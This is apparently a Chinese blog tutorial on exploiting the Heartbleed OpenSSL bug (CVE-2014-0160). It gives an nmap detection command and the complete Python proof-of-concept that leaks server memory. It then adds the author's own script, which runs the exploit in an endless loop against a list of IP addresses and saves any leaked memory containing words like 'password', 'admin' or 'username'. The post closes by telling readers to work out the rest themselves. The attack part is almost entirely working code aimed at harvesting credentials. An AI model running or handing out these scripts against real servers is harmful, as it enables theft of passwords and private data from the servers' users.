一、开始扫描

工具 CSHeartbleedScanner
  1. nmap -p 443,465,563,636,990,993,995,3306,5432 --script ssl-heartbleed <target>

二、获取目标服务器内存数据poc

  1. #!/usr/bin/python
  2. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  3. # The author disclaims copyright to this source code.
  4. import sys
  5. import struct
  6. import socket
  7. import time
  8. import select
  9. import re
  10. from optparse import OptionParser
  11. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  12. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
  13. def h2bin(x):
  14. return x.replace(' ', '').replace('\n', '').decode('hex')
  15. hello = h2bin('''
  16. 16 03 02 00 dc 01 00 00 d8 03 02 53
  17. 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
  18. bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
  19. 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
  20. 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
  21. c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
  22. c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
  23. c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
  24. c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
  25. 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
  26. 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
  27. 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
  28. 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
  29. 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
  30. 00 0f 00 01 01
  31. ''')
  32. hb = h2bin('''
  33. 18 03 02 00 03
  34. 01 40 00
  35. ''')
  36. def hexdump(s):
  37. pdat = ''
  38. for b in xrange(0, len(s), 16):
  39. lin = [c for c in s[b : b + 16]]
  40. pdat += ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
  41. print '%s' % (pdat.replace('......', ''),)
  42. print
  43. def recvall(s, length, timeout=5):
  44. endtime = time.time() + timeout
  45. rdata = ''
  46. remain = length
  47. while remain > 0:
  48. rtime = endtime - time.time()
  49. if rtime < 0:
  50. return None
  51. r, w, e = select.select([s], [], [], 5)
  52. if s in r:
  53. data = s.recv(remain)
  54. # EOF?
  55. if not data:
  56. return None
  57. rdata += data
  58. remain -= len(data)
  59. return rdata
  60. def recvmsg(s):
  61. hdr = recvall(s, 5)
  62. if hdr is None:
  63. print 'Unexpected EOF receiving record header - server closed connection'
  64. return None, None, None
  65. typ, ver, ln = struct.unpack('>BHH', hdr)
  66. pay = recvall(s, ln, 10)
  67. if pay is None:
  68. print 'Unexpected EOF receiving record payload - server closed connection'
  69. return None, None, None
  70. print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
  71. return typ, ver, pay
  72. def hit_hb(s):
  73. s.send(hb)
  74. while True:
  75. typ, ver, pay = recvmsg(s)
  76. if typ is None:
  77. print 'No heartbeat response received, server likely not vulnerable'
  78. return False
  79. if typ == 24:
  80. print 'Received heartbeat response:'
  81. hexdump(pay)
  82. if len(pay) > 3:
  83. print 'WARNING: server returned more data than it should - server is vulnerable!'
  84. else:
  85. print 'Server processed malformed heartbeat, but did not return any extra data.'
  86. return True
  87. if typ == 21:
  88. print 'Received alert:'
  89. hexdump(pay)
  90. print 'Server returned error, likely not vulnerable'
  91. return False
  92. def main():
  93. opts, args = options.parse_args()
  94. if len(args) < 1:
  95. options.print_help()
  96. return
  97. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  98. print 'Connecting...'
  99. sys.stdout.flush()
  100. s.connect((args[0], opts.port))
  101. print 'Sending Client Hello...'
  102. sys.stdout.flush()
  103. s.send(hello)
  104. print 'Waiting for Server Hello...'
  105. sys.stdout.flush()
  106. while True:
  107. typ, ver, pay = recvmsg(s)
  108. if typ == None:
  109. print 'Server closed connection without sending Server Hello.'
  110. return
  111. # Look for server hello done message.
  112. if typ == 22 and ord(pay[0]) == 0x0E:
  113. break
  114. print 'Sending heartbeat request...'
  115. sys.stdout.flush()
  116. s.send(hb)
  117. hit_hb(s)
  118. if __name__ == '__main__':
  119. main()

三、不间断获取服务器内存信息

配合上面的代码
  1. import os
  2. import re
  3. import time
  4. f= open('ips.txt','r')
  5. ips= []
  6. for ip in f.readlines():
  7. ips.append(ip.split())
  8. f.close()
  9. while True:
  10. for i in ips:
  11. cmd = 'python ssltest.py %s'% str(i[0])
  12. result = os.popen(cmd).read()
  13. keywords = ['system', 'password', 'passwd', 'admin','username','login','pass','user']
  14. for word in keywords:
  15. if result.find(word) > 0:
  16. print 'new data', time.asctime()
  17. with open('data\\' + time.asctime().replace(':', ' ') + '.txt', 'a') as f:
  18. f.write(result)
  19. break
  20. time.sleep(1.0)
最后,具体怎么操作?自己领会吧。 

发表评论

电子邮件地址不会被公开。 必填项已用*标注